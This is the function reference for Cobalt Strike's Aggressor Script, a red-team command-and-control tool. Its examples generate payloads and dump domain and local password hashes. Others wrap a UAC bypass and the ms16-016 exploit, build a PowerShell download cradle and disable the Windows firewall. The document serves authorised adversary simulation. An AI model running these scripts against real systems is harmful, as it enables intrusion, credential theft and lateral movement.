Functions
This is a list of Aggressor Script's functions.
Quick Jump-hasbootstraphint
Check if a byte array has the x86 or x64 bootstrap hint. Use this function to determine if it's safe to use an artifact that passes GetProcAddress/GetModuleHandleA pointers to this payload.
Arguments
$1 - byte array with a payload or shellcode.
See also
-is64
Check if a session is on an x64 system or not (Beacon only).
Arguments
$1 - Beacon/Session ID
Example
command x64 {
foreach $session (beacons()) {
if (-is64 $session['id']) {
println($session);
}
}
}
-isactive
Check if a session is active or not. A session is considered active if (a) it has not acknowledged an exit message AND (b) it is not disconnected from a parent Beacon.
Arguments
$1 - Beacon/Session ID
Example
command active {
local('$bid');
foreach $bid (beacon_ids()) {
if (-isactive $bid) {
println("$bid is active!");
}
}
}
-isadmin
Check if a session has admin rights
Arguments
$1 - Beacon/Session ID
Example
command admin_sessions {
foreach $session (beacons()) {
if (-isadmin $session['id']) {
println($session);
}
}
}
-isbeacon
Check if a session is a Beacon or not.
Arguments
$1 - Beacon/Session ID
Example
command beacons {
foreach $session (beacons()) {
if (-isbeacon $session['id']) {
println($session);
}
}
}
-isssh
Check if a session is an SSH session or not.
Arguments
$1 - Beacon/Session ID
Example
command ssh_sessions {
foreach $session (beacons()) {
if (-isssh $session['id']) {
println($session);
}
}
}
action
Post a public action message to the event log. This is similar to the /me command.
Arguments
$1 - the message
Example
action("dances!");
addTab
Create a tab to display a GUI object.
Arguments
$1 - the title of the tab
$2 - a GUI object. A GUI object is one that is an instance of javax.swing.JComponent.
$3 - a tooltip to display when a user hovers over this tab.
Example
$label = [new javax.swing.JLabel: "Hello World"];
addTab("Hello!", $label, "this is an example");
addVisualization
Register a visualization with Cobalt Strike.
Arguments
$1 - the name of the visualization
$2 - a javax.swing.JComponent object
Example
$label = [new javax.swing.JLabel: "Hello World!"];
addVisualization("Hello World", $label);
See also
add_to_clipboard
Add text to the clipboard, notify the user.
Arguments
$1 - the text to add to the clipboard
Example
add_to_clipboard("Paste me you fool!");
alias
Creates an alias command in the Beacon console
Arguments
$1 - the alias name to bind to
$2 - a callback function. Called when the user runs the alias. Arguments are: $0 = command run, $1 = beacon id, $2 = arguments.
Example
alias("foo", {
btask($1, "foo!");
});
alias_clear
Removes an alias command (and restores default functionality; if it existed)
Arguments
$1 - the alias name to remove
Example
alias_clear("foo");
all_payloads
Generates all of the stageless payloads (in x86 and x64) for all of the configured listeners. (also available in the UI menu under Payloads -> Windows Stageless Generate all Payloads)
Arguments
$1 - The folder path to create the payloads in.
$2 - A boolean value for whether the executable files should be signed.
$3 – A string value for the system call method. Valid values are:
Direct: Use the Nt* version of the function.
Indirect: Jump to the appropriate instruction within the Nt* version of the function.
$4 - (optional) The supporting HTTP library for generated beacons (wininet|winhttp|$null|blank string).
Example
$folder = all_payloads "/tmp/payloads", 1, "None");
println("Payloads have been saved to $folder");
applications
Returns a list of application information in Cobalt Strike's data model. These applications are results from the System Profiler.
Returns
An array of dictionary objects with information about each application.
Example
printAll(applications());
archives
Returns a massive list of archived information about your activity from Cobalt Strike's data model. This information is leaned on heavily to reconstruct your activity timeline in Cobalt Strike's reports.
Returns
An array of dictionary objects with information about your team's activity.
Example
foreach $index => $entry (archives()) {
println("\c3( $+ $index $+ )\o $entry");
}
artifact
DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_stager instead.
Generates a stager artifact (exe, dll) from a Cobalt Strike listener
Arguments
$1 - the listener name
$2 - the artifact type
$3 - deprecated; this parameter no longer has any meaning.
$4 - x86|x64 - the architecture of the generated stager
| Type | Description |
|---|---|
| dll | an x86 DLL |
| dllx64 | an x64 DLL |
| exe | a plain executable |
| powershell | a powershell script |
| python | a python script |
| svcexe | a service executable |
| vbscript | a Visual Basic script |
Note
Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.
Returns
A scalar containing the specified artifact.
Example
$data = artifact("my listener", "exe");
$handle = openf(">out.exe");
writeb($handle, $data);
closef($handle);
artifact_general
Generates a payload artifact from arbitrary shellcode.
Arguments
$1 - the shellcode
$2 - the artifact type
$3 - x86|x64 - the architecture of the generated payload
| Type | Description |
|---|---|
| dll | a DLL |
| exe | a plain executable |
| powershell | a powershell script |
| python | a python script |
| svcexe | a service executable |
Note
While the Python artifact in Cobalt Strike is designed to simultaneously carry an x86 and x64 payload; this function will only populate the script with the architecture argument specified as $3
artifact_payload
Generates a stageless payload artifact (exe, dll) from a Cobalt Strike listener name
Arguments
$1 - the listener name
$2 - the artifact type
$3 - x86|x64 - the architecture of the generated payload (stage)
$4 - exit method: 'thread' (leave the thread when done) or 'process' (exit the process when done). Use 'thread' if injecting into an existing process.
$5 – A string value for the system call method. Valid values are:
Direct: Use the Nt* version of the function.
Indirect: Jump to the appropriate instruction within the Nt* version of the function.
| Type | Description |
|---|---|
| dll | a DLL |
| exe | a plain executable |
| powershell | a powershell script |
| python | a python script |
| raw | raw payload stage |
| svcexe | a service executable |
$6 - (optional) The supporting HTTP library for generated beacons (wininet|winhttp|$null|blank string).
Note
While the Python artifact in Cobalt Strike is designed to simultaneously carry an x86 and x64 payload; this function will only populate the script with the architecture argument specified as $3
Example
$data = artifact_payload("my listener", "exe", "x86", “process”, “Indirect”);
artifact_sign
Sign an EXE or DLL file
Arguments
$1 - the contents of the EXE or DLL file to sign
Notes
- This function requires that a code-signing certificate is specified in this server's Malleable C2 profile. If no code-signing certificate is configured, this function will return
$1with no changes. - DO NOT sign an executable or DLL twice. The library Cobalt Strike uses for code-signing will create an invalid (second) signature if the executable or DLL is already signed.
Returns
A scalar containing the signed artifact.
Example
# generate an artifact!
$data = artifact("my listener", "exe");
# sign it.
$data = artifact_sign($data);
# save it
$handle = openf(">out.exe");
writeb($handle, $data);
closef($handle);
artifact_stageless
DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_payload instead.
Generates a stageless artifact (exe, dll) from a (local) Cobalt Strike listener
Arguments
$1 - the listener name (must be local to this team server)
$2 - the artifact type
$3 - x86|x64 - the architecture of the generated payload (stage)
$4 - proxy configuration string
$5 - callback function. This function is called when the artifact is ready. The $1 argument is the stageless content.
| Type | Description |
|---|---|
| dll | an x86 DLL |
| dllx64 | an x64 DLL |
| exe | a plain executable |
| powershell | a powershell script |
| python | a python script |
| raw | raw payload stage |
| svcexe | a service executable |
Notes
- This function provides the stageless artifact via a callback function. This is necessary because Cobalt Strike generates payload stages on the team server.
- The proxy configuration string is the same string you would use with Payloads -> Windows Stageless Payload.
*direct*ignores the local proxy configuration and attempts a direct connection.protocol://user:[email protected]:portspecifies which proxy configuration the artifact should use. Theusernameandpasswordare optional (e.g.,protocol://host:portis fine). The acceptable protocols aresocksandhttp. Set the proxy configuration string to$nullor""to use the default behavior. Custom dialogs may use &drow_proxyserver to set this. - This function cannot generate artifacts for listeners on other team servers. This function also cannot generate artifacts for foreign listeners. Limit your use of this function to local listers with stages only. Custom dialogs may use &drow_listener_stage to choose an acceptable listener for this function.
- Note: while the Python artifact in Cobalt Strike is designed to simultaneously carry an x86 and x64 payload; this function will only populate the script with the architecture argument specified as
$3
Example
sub ready {
local('$handle');
$handle = openf(">out.exe");
writeb($handle, $1);
closef($handle);
}
artifact_stageless("my listener", "exe", "x86", "", &ready);
artifact_stager
Generates a stager artifact (exe, dll) from a Cobalt Strike listener
Arguments
$1 - the listener name
$2 - the artifact type
$3 - x86|x64 - the architecture of the generated stager
| Type | Description |
|---|---|
| dll | a DLL |
| exe | a plain executable |
| powershell | a powershell script |
| python | a python script |
| raw | the raw file |
| svcexe | a service executable |
| vbscript | a Visual Basic script |
Note
Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.
Returns
A scalar containing the specified artifact.
Example
$data = artifact_stager("my listener", "exe", "x86");
$handle = openf(">out.exe");
writeb($handle, $data);
closef($handle);
barch
Returns the architecture of your Beacon session (e.g., x86 or x64)
Arguments
$1 - the id for the beacon to pull metadata for
Note
If the architecture is unknown (e.g., a DNS Beacon that hasn't sent metadata yet); this function will return x86.
Example
println("Arch is: " . barch($1));
bargue_add
This function adds an option to Beacon's list of commands to spoof arguments for.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the command to spoof arguments for. Environment variables are OK here too.
$3 - the fake arguments to use when the specified command is run.
Notes
- The process match is exact. If Beacon tries to launch "net.exe", it will not match net, NET.EXE, or c:\windows\system32\net.exe. It will only match net.exe.
- x86 Beacon can only spoof arguments in x86 child processes. Likewise, x64 Beacon can only spoof arguments in x64 child processes.
- The real arguments are written to the memory space that holds the fake arguments. If the real arguments are longer than the fake arguments, the command launch will fail.
Example
# spoof cmd.exe arguments. bargue_add($1, "%COMSPEC%", "/K \"cd c:\windows\temp & startupdatenow.bat\""); # spoof net arguments bargue_add($1, "net", "user guest /active:no");
bargue_list
List the commands + fake arguments Beacon will spoof arguments for.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example
bargue_list($1);
bargue_remove
This function removes an option to Beacon's list of commands to spoof arguments for.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the command to spoof arguments for. Environment variables are OK here too.
Example
# don't spoof cmd.exe bargue_remove($1, "%COMSPEC%");
base64_decode
Unwrap a base64-encoded string
Arguments
$1 - the string to decode
Returns
The argument processed by a base64 decoder
Example
println(base64_decode(base64_encode("this is a test")));
base64_encode
Base64 encode a string
Arguments
$1 - the string to encode
Returns
The argument processed by a base64 encoder
Example
println(base64_encode("this is a test"));
bblockdlls
Launch child processes with binary signature policy that blocks non-Microsoft DLLs from loading in the process space.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - true or false; block non-Microsoft DLLs in child process
Note
This attribute is available in Windows 10 only.
Example
on beacon_initial {
binput($1, "blockdlls start");
bblockdlls($1, true);
}
bbrowser
Generate the beacon browser GUI component. Shows only Beacons.
Returns
The beacon browser GUI object (a javax.swing.JComponent)
Example
addVisualization("Beacon Browser", bbrowser());
See also
bbrowserpivot
Start a Browser Pivot
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the PID to inject the browser pivot agent into.
$3 - the architecture of the target PID (x86|x64)
Example
bbrowserpivot($1, 1234, "x86");
bbrowserpivot_stop
Stop a Browser Pivot
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example
bbrowserpivot_stop($1);
bbypassuac
REMOVED Removed in Cobalt Strike 4.0.
bcancel
Cancel a file download
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the file to cancel or a wildcard.
Example
item "&Cancel Downloads" {
bcancel($1, "*");
}
bcd
Ask a Beacon to change it's current working directory.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the folder to change to.
Example
# create a command to change to the user's home directory
alias home {
$home = "c:\\users\\" . binfo($1, "user");
bcd($1, $home);
}
bcheckin
Ask a Beacon to checkin. This is basically a no-op for Beacon.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example
item "&Checkin" {
binput($1, "checkin");
bcheckin($1);
}
bclear
This is the "oops" command. It clears the queued tasks for the specified beacon.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example
bclear($1);
bconnect
Ask Beacon (or SSH session) to connect to a Beacon peer over a TCP socket
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the target to connect to
$3 - (optional) the port to use. Default profile port is used otherwise.
Note
Use &beacon_link if you want a script function that will connect or link based on a listener configuration.
Example
bconnect($1, "DC");
bcovertvpn
Ask Beacon to deploy a Covert VPN client.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the Covert VPN interface to deploy
$3 - the IP address of the interface [on target] to bridge into
$4 - (optional) the MAC address of the Covert VPN interface
Example
bcovertvpn($1, "phear0", "172.16.48.18");
bcp
Ask Beacon to copy a file or folder.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the file or folder to copy
$3 - the destination
Example
bcp($1, "evil.exe", "\\\\target\\C$\\evil.exe");
bdata
Get metadata for a Beacon session.
Arguments
$1 - the id for the beacon to pull metadata for
Returns
A dictionary object with metadata about the Beacon session.
Example
println(bdata("1234"));
bdcsync
Use mimikatz's dcsync command to pull a user's password hash from a domain controller. This function requires a domain administrator trust relationship.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - fully qualified name of the domain
$3 - (optional) DOMAIN\user to pull hashes for
$4 - (optional) the PID to inject the dcsync command into or $null
$5 - (optional) the architecture of the target PID (x86|x64) or $null
Note
If $3 is left out, dcsync will dump all domain hashes.
Examples
Spawn a temporary process
# dump a specific account bdcsync($1, "PLAYLAND.testlab", "PLAYLAND\\Administrator"); # dump all accounts bdcsync($1, "PLAYLAND.testlab");
Inject into the specified process
# dump a specific account
bdcsync($1, "PLAYLAND.testlab", "PLAYLAND\\Administrator", 1234, "x64");
# dump all accounts
bdcsync($1, "PLAYLAND.testlab", $null, 1234, "x64");
bdesktop
Start a VNC session.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example
item "&Desktop (VNC)" {
bdesktop($1);
}
bdllinject
Inject a Reflective DLL into a process.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the PID to inject the DLL into
$3 - the local path to the Reflective DLL
Example
bdllinject($1, 1234, script_resource("test.dll"));
bdllload
Call LoadLibrary() in a remote process with the specified DLL.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the target process PID
$3 - the on-target path to a DLL
Note
The DLL must be the same architecture as the target process.
Example
bdllload($1, 1234, "c:\\windows\\mystuff.dll");
bdllspawn
Spawn a Reflective DLL as a Beacon post-exploitation job.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the local path to the Reflective DLL
$3 - a parameter to pass to the DLL
$4 - a short description of this post exploitation job (shows up in jobs output)
$5 - true/false; use impersonated token when running this post-ex job?
$6 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map
Notes
- This function will spawn an x86 process if the Reflective DLL is an x86 DLL. Likewise, if the Reflective DLL is an x64 DLL, this function will spawn an x64 process.
- A well-behaved Reflective DLL follows these rules:
- Receives a parameter via the reserved DllMain parameter when the DLL_PROCESS_ATTACH reason is specified.
- Prints messages to STDOUT
- Calls
fflush(stdout)to flush STDOUT - Calls
ExitProcess(0)when done. This kills the spawned process to host the capability.
Example (ReflectiveDll.c)
This example is based on Stephen Fewer's Reflective DLL Injection Project:
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) {
BOOL bReturnValue = TRUE;
switch( dwReason ) {
case DLL_QUERY_HMODULE:
if( lpReserved != NULL )
*(HMODULE *)lpReserved = hAppInstance;
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
/* print some output to the operator */
if (lpReserved != NULL) {
printf("Hello from test.dll.
Parameter is '%s'\n", (char *)lpReserved);
}
else {
printf("Hello from test.dll. There is no parameter\n");
}
/* flush STDOUT */
fflush(stdout);
/* we're done, so let's exit */
ExitProcess(0);
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
}
Example (Aggressor Script)
alias hello {
bdllspawn($1, script_resource("reflective_dll.dll"), $2,
"test dll", 5000, false);
}
bdownload
Ask a Beacon to download a file
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the file to request
Example
bdownload($1, "c:\\sysprep.inf");
bdrives
Ask Beacon to list the drives on the compromised system
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example
item "&Drives" {
binput($1, "drives");
bdrives($1);
}
beacon_command_describe
Describe a Beacon command.
Returns
A string description of the Beacon command.
Arguments
$1 - the command
Example
println(beacon_command_describe("ls"));
beacon_command_detail
Get the help information for a Beacon command.
Returns
A string with helpful information about a Beacon command.
Arguments
$1 - the command
Example
println(beacon_command_detail("ls"));
beacon_command_register
Register help information for a Beacon command.
Arguments
$1 - the command
$2 - the short description of the command
$3 - the long-form help for the command.
Example
alis echo {
blog($1, "You typed: " . substr($1, 5));
}
beacon_command_register(
"echo",
"echo text to beacon log",
"Synopsis: echo [arguments]\n\nLog arguments to the beacon console");
beacon_commands
Get a list of Beacon commands.
Returns
An array of Beacon commands.
Example
printAll(beacon_commands());
beacon_data
Get metadata for a Beacon session.
Arguments
$1 - the id for the beacon to pull metadata for
Returns
A dictionary object with metadata about the Beacon session.
Example
println(beacon_data("1234"));
beacon_elevator_describe
Describe a Beacon command elevator exploit
Returns
A string description of the Beacon command elevator
Arguments
$1 - the exploit
Example
println(beacon_elevator_describe("uac-token-duplication"));
See Also
&beacon_elevator_register, &beacon_elevators, &belevate_command
beacon_elevator_register
Register a Beacon command elevator with Cobalt Strike. This adds an option to the runasadmin command.
Arguments
$1 - the exploit short name
$2 - a description of the exploit
$3 - the function that implements the exploit ($1 is the Beacon ID, $2 the command and arguments)
Example
# Integrate schtasks.exe (via SilentCleanup) Bypass UAC attack
# Sourced from Empire: https://github.com/EmpireProject/Empire/tree/master/data/module_source/privesc
sub schtasks_elevator {
local('$handle $script $oneliner $command');
# acknowledge this command
btask($1, "Tasked Beacon to execute $2 in a high integrity context", "T1088");
# read in the script
$handle = openf(getFileProper(script_resource("modules"), "Invoke-EnvBypass.ps1"));
$script = readb($handle, -1);
closef($handle);
# host the script in Beacon
$oneliner = beacon_host_script($1, $script);
# base64 encode the command
$command = transform($2, "powershell-base64");
# run the specified command via this exploit.
bpowerpick!($1, "Invoke-EnvBypass -Command \" $+ $command $+ \"", $oneliner);
}
beacon_elevator_register("uac-schtasks", "Bypass UAC with schtasks.exe (via SilentCleanup)", &schtasks_elevator);
See Also
&beacon_elevator_describe, &beacon_elevators, &belevate_command
beacon_elevators
Get a list of command elevator exploits registered with Cobalt Strike.
Returns
An array of Beacon command elevators
Example
printAll(beacon_elevators());
See also
&beacon_elevator_describe, &beacon_elevator_register, &belevate_command
beacon_execute_job
Run a command and report its output to the user.
Arguments
$1 - the Beacon ID
$2 - the command to run (environment variables are resolved)
$3 - the command arguments (environment variables are not resolved).
$4 - flags that change how the job is launched (e.g., 1 = disable WOW64 file system redirection)
Notes
- The string $2 and $3 are combined as-is into a command line. Make sure you begin $3 with a space!
- This is the mechanism Cobalt Strike uses for its shell and powershell commands.
Example
alias shell {
local('$args');
$args = substr($0, 6);
btask($1, "Tasked beacon to run: $args", "T1059");
beacon_execute_job($1, "%COMSPEC%", " /C $args", 0);
}
beacon_exploit_describe
Describe a Beacon exploit
Returns
A string description of the Beacon exploit
Arguments
$1 - the exploit
Example
println(beacon_exploit_describe("ms14-058"));
See Also
&beacon_exploit_register, &beacon_exploits, &belevate
beacon_exploit_register
Register a Beacon privilege escalation exploit with Cobalt Strike. This adds an option to the elevate command.
Arguments
$1 - the exploit short name
$2 - a description of the exploit
$3 - the function that implements the exploit ($1 is the Beacon ID, $2 is the listener)
Example
# Integrate windows/local/ms16_016_webdav from Metasploit
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms16_016_webdav.rb
sub ms16_016_exploit {
local('$stager');
# check if we're on an x64 system and error out.
if (-is64 $1) {
berror($1, "ms16-016 exploit is x86 only");
return;
}
# acknowledge this command
btask($1, "Task Beacon to run " . listener_describe($2) . " via ms16-016", "T1068");
# generate our shellcode
$stager = payload($2, "x86");
# spawn a Beacon post-ex job with the exploit DLL
bdllspawn!($1, getFileProper(script_resource("modules"), "cve-2016-0051.x86.dll"), $stager, "ms16-016", 5000);
# link to our payload if it's a TCP or SMB Beacon
beacon_link($1, $null, $2);
}
beacon_exploit_register("ms16-016", "mrxdav.sys WebDav Local Privilege Escalation (CVE 2016-0051)", &ms16_016_exploit);
See Also
&beacon_exploit_describe, &beacon_exploits, &belevate
beacon_exploits
Get a list of privilege escalation exploits registered with Cobalt Strike.
Returns
An array of Beacon exploits.
Example
printAll(beacon_exploits());
See also
&beacon_exploit_describe, &beacon_exploit_register, &belevate
beacon_host_imported_script
Locally host a previously imported PowerShell script within Beacon and return a short script that will download and invoke this script.
Arguments
$1 - the id of the Beacon to host this script with.
Returns
A short PowerShell script to download and evaluate the previously script when run. How this one-liner is used is up to you!
Example
alias powershell {
local('$args $cradle $runme $cmd');
# $0 is the entire command with no parsing.
$args = substr($0, 11);
# generate the download cradle (if one exists) for an imported PowerShell script
$cradle = beacon_host_imported_script($1);
# encode our download cradle AND cmdlet+args we want to run
$runme = base64_encode( str_encode($cradle . $args, "UTF-16LE") );
# Build up our entire command line.
$cmd = " -nop -exec bypass -EncodedCommand \" $+ $runme $+ \"";
# task Beacon to run all of this.
btask($1, "Tasked beacon to run: $args", "T1086");
beacon_execute_job($1, "powershell", $cmd, 1);
}
beacon_host_script
Locally host a PowerShell script within Beacon and return a short script that will download and invoke this script. This function is a way to run large scripts when there are constraints on the length of your PowerShell one-liner.
Arguments
$1 - the id of the Beacon to host this script with.
$2 - the script data to host.
Returns
A short PowerShell script to download and evaluate the script when run. How this one-liner is used is up to you!
Example
alias test {
local('$script $hosted');
$script = "2 + 2";
$hosted = beacon_host_script($1, $script);
binput($1, "powerpick $hosted");
bpowerpick($1, $hosted);
}
beacon_ids
Get the ID of all Beacons calling back to this Cobalt Strike team server.
Returns
An array of beacon IDs
Example
foreach $bid (beacon_ids()) {
println("Bid: $bid");
}
beacon_info
Get information from a Beacon session's metadata.
Arguments
$1 - the id for the beacon to pull metadata for
$2 - the key to extract
Returns
A string with the requested information.
Example
println("User is: " . beacon_info("1234", "user"));
println("PID is: " . beacon_info("1234", "pid"));
beacon_inline_execute
Execute a Beacon Object File
Arguments
$1 - the id for the Beacon
$2 - a string containing the BOF file
$3 - the entry point to call
$4 - packed arguments to pass to the BOF file
$5 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map
Note
The Cobalt Strike documentation has a page specific to BOF files. See Beacon Object Files.
Example (hello.c)
/*
* Compile with:
* x86_64-w64-mingw32-gcc -c hello.c -o hello.x64.o
* i686-w64-mingw32-gcc -c hello.c -o hello.x86.o
*/
#include "windows.h"
#include "stdio.h"
#include "tlhelp32.h"
#include "beacon.h"
void demo(char * args, int length) {
datap parser;
char * str_arg;
int num_arg;
BeaconDataParse(&parser, args, length);
str_arg = BeaconDataExtract(&parser, NULL);
num_arg = BeaconDataInt(&parser);
BeaconPrintf(CALLBACK_OUTPUT, "Message is %s with %d arg", str_arg, num_arg);
}
Example (hello.cna)
alias hello {
local('$barch $handle $data $args');
# figure out the arch of this session
$barch = barch($1);
# read in the right BOF file
$handle = openf(script_resource("hello. $+ $barch $+ .o"));
$data = readb($handle, -1);
closef($handle);
# pack our arguments
$args = bof_pack($1, "zi", "Hello World", 1234);
# announce what we're doing
btask($1, "Running Hello BOF");
# execute it.
beacon_inline_execute($1, $data, "demo", $args);
}
See Also
beacon_link
This function links to an SMB or TCP listener. If the specified listener is not an SMB or TCP listener, this function does nothing.
Arguments
$1 - the id of the beacon to link through
$2 - the target host to link to. Use $null for localhost.
$3 - the listener to link
Example
# smartlink [target] [listener name]
alias smartlink {
beacon_link($1, $2, $3);
}
beacon_remote_exec_method_describe
Describe a Beacon remote execute method
Returns
A string description of the Beacon remote execute method.
Arguments
$1 - the method
Example
println(beacon_remote_exec_method_describe("wmi"));
See also
&beacon_remote_exec_method_register, &beacon_remote_exec_methods, &bremote_exec
beacon_remote_exec_method_register
Register a Beacon remote execute method with Cobalt Strike. This adds an option for use with the remote-exec command.
Arguments
$1 - the method short name
$2 - a description of the method
$3 - the function that implements the exploit ($1 is the Beacon ID, $2 is the target, $3 is the command+args)
See Also
&beacon_remote_exec_method_describe, &beacon_remote_exec_methods, &bremote_exec
beacon_remote_exec_methods
Get a list of remote execute methods registered with Cobalt Strike.
Returns
An array of remote exec modules.
Example
printAll(beacon_remote_exec_methods());
See also
&beacon_remote_exec_method_describe, &beacon_remote_exec_method_register, &bremote_exec
beacon_remote_exploit_arch
Get the arch info for this Beacon lateral movement option.
Arguments
$1 - the exploit
Returns
x86 or x64
Example
println(beacon_remote_exploit_arch("psexec"));
See Also
&beacon_remote_exploit_register, &beacon_remote_exploits, &bjump
beacon_remote_exploit_describe
Describe a Beacon lateral movement option.
Returns
A string description of the Beacon lateral movement option.
Arguments
$1 - the exploit
Example
println(beacon_remote_exploit_describe("psexec"));
See Also
&beacon_remote_exploit_register, &beacon_remote_exploits, &bjump
beacon_remote_exploit_register
Register a Beacon lateral movement option with Cobalt Strike. This function extends the jump command.
Arguments
$1 - the exploit short name
$2 - the arch associated with this attack (e.g., x86, x64)
$3 - a description of the exploit
$4 - the function that implements the exploit ($1 is the Beacon ID, $2 is the target, $3 is the listener)
See also
&beacon_remote_exploit_describe, &beacon_remote_exploits, &bjump
beacon_remote_exploits
Get a list of lateral movement options registered with Cobalt Strike.
Returns
An array of lateral movement option names.
Example
printAll(beacon_remote_exploits());
See also
&beacon_remote_exploit_describe, &beacon_remote_exploit_register, &bjump
beacon_remove
Remove a Beacon from the display.
Arguments
$1 - the id for the beacon to remove
beacon_stage_pipe
This function handles the staging process for a bind pipe stager. This is an optional stager for lateral movement. You can stage any x86 payload/listener through this stager. Use &stager_bind_pipe to generate this stager.
Arguments
$1 - the id of the beacon to stage through
$2 - the target host
$3 - the listener name
$4 - the architecture of the payload to stage. x86 is the only option right now.
Example
# step 1. generate our stager
$stager = stager_bind_pipe("my listener");
# step 2. do something to run our stager
# step 3. stage a payload via this stager
beacon_stage_pipe($bid, $target, "my listener", "x86");
# step 4. assume control of the payload (if needed)
beacon_link($bid, $target, "my listener");
beacon_stage_tcp
This function handles the staging process for a bind TCP stager. This is the preferred stager for localhost-only staging. You can stage any payload/listener through this stager. Use &stager_bind_tcp to generate this stager.
Arguments
$1 - the id of the beacon to stage through
$2 - reserved; use $null for now.
$3 - the port to stage to
$4 - the listener name
$5 - the architecture of the payload to stage (x86, x64)
Example
# step 1. generate our stager
$stager = stager_bind_tcp("my listener", "x86", 1234);
# step 2. do something to run our stager
# step 3. stage a payload via this stager
beacon_stage_tcp($bid, $target, 1234, "my listener", "x86");
# step 4. assume control of the payload (if needed)
beacon_link($bid, $target, "my listener");
beacons
Get information about all Beacons calling back to this Cobalt Strike team server.
Returns
An array of dictionary objects with information about each beacon.
Example
foreach $beacon (beacons()) {
println("Bid: " . $beacon['id'] . " is " . $beacon['name']);
}
belevate
Ask Beacon to spawn an elevated session with a registered technique.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the exploit to fire
$3 - the listener to target.
Example
item "&Elevate 31337" {
openPayloadHelper(lambda({
binput($bids, "elevate ms14-058 $1");
belevate($bids, "ms14-058", $1);
}, $bids => $1));
}
See also
&beacon_exploit_describe, &beacon_exploit_register, &beacon_exploits
belevate_command
Ask Beacon to run a command in a high-integrity context
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the module/command elevator to use
$3 - the command and its arguments.
Example
# disable the firewall
alias shieldsdn {
belevate_command($1, "uac-token-duplication", "cmd.exe /C netsh advfirewall set allprofiles state off");
}
See also
&beacon_elevator_describe, &beacon_elevator_register, &beacon_elevators
berror
Publish an error message to the Beacon transcript
Arguments
$1 - the id for the beacon to post to
$2 - the text to post
Example
alias donotrun {
berror($1, "You should never run this command!");
}
bexecute
Ask Beacon to execute a command [without a shell]. This provides no output to the user.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the command and arguments to run
Example
bexecute($1, "notepad.exe");
bexecute_assembly
Spawns a local .NET executable assembly as a Beacon post-exploitation job.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the local path to the .NET executable assembly
$3 - parameters to pass to the assembly
$4 - (optional) the "PATCHES:" argument can modify functions in memory for the process. Up to 4 "patch-rule" rules can be specified (space delimited).
$5 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map
"patch-rule" syntax (comma delimited): [library],[function],[offset],[hex-patch-value]
library - 1-260 characters
function - 1-256 characters
offset - 0-65535 (The offset from the start of the executable function)
hex-patch-value - 2-200 hex characters (0-9,A-F). Length must be even number (hex pairs).
Notes
- This command accepts a valid .NET executable and calls its entry point.
- This post-exploitation job inherits Beacon's thread token.
- Compile your custom .NET programs with a .NET 3.5 compiler for compatibility with systems that don't have .NET 4.0 and later.
Example
alias myutil {
bexecute_assembly($1, script_resource("myutil.exe"), "arg1 arg2 \"arg 3\"");
}
bexit
Ask a Beacon to exit.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example
item "&Die" {
binput($1, "exit");
bexit($1);
}
bgetprivs
Attempts to enable the specified privilege in your Beacon session.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - a comma-separated list of privileges to enable. See:
https://msdn.microsoft.com/en-us/library/windows/desktop/bb530716(v=vs.85).aspx
Example
alias debug {
bgetprivs($1, "SeDebugPriv");
}
bgetsystem
Ask Beacon to attempt to get the SYSTEM token.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example
item "Get &SYSTEM" {
binput($1, "getsystem");
bgetsystem($1);
}
bgetuid
Ask Beacon to print the User ID of the current token
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
bgetuid($1);
bhashdump
Ask Beacon to dump local account password hashes. If injecting into a pid that process requires administrator privileges.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the PID to inject the hashdump dll into or $null.
$3 - (optional) the architecture of the target PID (x86|x64) or $null.
$4 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map.
Example
Spawn a temporary process
item "Dump &Hashes" {
binput($1, "hashdump");
bhashdump($1);
}
Inject into the specified process)
bhashdump($1, 1234, "x64");
bind
Bind a keyboard shortcut to an Aggressor Script function. This is an alternate to the bind keyword.
Arguments
$1 - the keyboard shortcut
$2 - a callback function. Called when the event happens.
Example
# bind Ctrl+Left and Ctrl+Right to cycle through previous and next tab.
